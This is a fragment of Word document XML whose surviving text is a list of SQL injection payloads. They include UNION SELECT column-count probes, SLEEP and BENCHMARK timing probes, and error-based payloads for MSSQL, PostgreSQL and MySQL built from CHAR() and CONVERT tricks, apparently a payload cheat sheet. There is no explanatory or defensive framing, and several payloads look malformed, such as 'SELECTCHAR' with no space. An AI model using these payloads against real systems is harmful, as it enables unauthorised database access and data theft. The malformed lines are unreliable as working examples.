    <w:p w14:paraId="5ADF6CF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4864D83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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC67EB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF7B45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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CECF4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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F3279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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5043BB2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516FB07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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D0C0C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177FA6E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17337A6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEBDD5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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F97529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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B48014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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346526C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278E80E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F4167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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0F2A2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CFE55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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299F158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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57098F5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1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CDF34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1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF9998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1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018350C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BF4E8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3734F95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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064DA76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UNION ALL SELECT 1,2,3,4#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1CE0A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE361A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702513C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5975E07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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A31F1A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0910702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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AA815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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6631FC1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A1E63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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0A75B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2853F41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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C79F5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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0038EB6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AABE1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4BF1C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B87D4C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F9F26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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D5A18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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A37E4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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3064B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6795F65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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1914B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003D976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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E58D3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1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6266CE5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1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D07E98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1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5395CF4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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353DD9B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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D541A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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3044822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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F41EDE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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4FB72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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2032ABB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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F23CB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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320FD28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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240D738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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3315784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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B50AA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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116652A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UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7CB98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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E6AEC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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CD269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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494D940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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40353E2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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559DC43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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207E5E3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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF0EF5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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781BDA5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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F950D3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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74297C8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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769C318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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6125994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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A77304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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4983358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1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A98F6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1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F02D7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1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010C815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@@VERSION,SLEEP(5),3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CB14B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@@VERSION,SLEEP(5),USER(),4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E7759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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9732D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69864E2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6071052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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADFCB4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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2687989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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF60C0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C378E2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A56524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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA03AC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FB9FD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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2530A45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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561DB39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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C805A3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7312A59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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6733A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B353E2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749DFF4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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C57787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UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B4A10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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16926DE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8DE63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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C6B76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@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627602C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@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6455F79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@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5107687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@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243F819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@@VERSION,SLEEP(5),"'3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335A2D1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@@VERSION,SLEEP(5),"'3'"#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25813CB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@@VERSION,SLEEP(5),USER(),4#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A027B5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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C428A0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB6FF9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A775EC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607BD0D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0908563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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE09B6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B792D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B883D2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A0051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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EF6AF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E66C8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DD593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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B58B3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA9E32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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637D2E0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545B510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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3F6F6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UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A091C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1506AD8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3C13A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CA879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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC0A63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@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB5573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@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DF742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@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E78E02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SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3C110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USER()-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21664A1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SLEEP(5)-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C34C9D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USER(),SLEEP(5)-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4031130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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B2E09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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5F92F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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F95125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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04ECCDC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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9EF3A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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF7306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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0507CEB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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1792BF8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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C9EDC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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B4391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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310032E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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAD9D2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UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7274090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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688B8CF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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAAB7F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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C60645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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F5F66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@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFAD25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@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7764364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@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8370E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@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8F146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@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0F708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@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5C466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@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3505BE1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@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3859C50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UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E88D7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@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0288B62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NULL-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BFA89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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B28C5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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBE789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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5224046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SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACABAD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SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6DA90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SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF99DB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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1623AC0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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718C484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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBD0E8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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E22E8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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281FA55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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6116F29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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4864771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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5139CC6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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3164635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SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7343D01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SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B936AF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AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317A257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SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FC53D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NULL#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C296AD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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF4D77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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFA681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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43770F5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SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4995760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SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DD74B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SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD41EC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AC660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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D399F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC6C77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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DEEA2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CAF1A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A47E2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3689C30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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0C3B1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1644914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SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F85AD5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SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265832C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AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A006E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SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3634CDB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NULL </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C5A9F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1417696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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6133CFD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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB8434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SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F9665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SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D7DAE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SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF53B0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E5C84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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F41B5C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E810B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD588B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEA4DE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BAD7E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF99BF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E17E3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B4E1D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SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B48123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SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EF115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AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C79C04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5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D3278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5650=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5650=5650) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A16DD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3516=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3516=3516) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(106)||CHR(107)||CHR(113)) AS NUMERIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFFC99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AND (SELECT 4523 FROM(SELECT COUNT(*),CONCAT(0x716a7a6a71,(SELECT (ELT(4523=4523,1))),0x71706a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE582B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CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(106)+CHAR(99)+CHAR(73)+CHAR(66)+CHAR(109)+CHAR(119)+CHAR(81)+CHAR(108)+CHAR(88)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113),NULL-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D39C3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021DA52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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4654BC1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC023F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5531476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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8DE20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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0424568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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0118067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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BC7DB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072E91D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209DE6B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A806F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2091E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058939D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7D6D9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w:t>
      </w:r>
    </w:p>
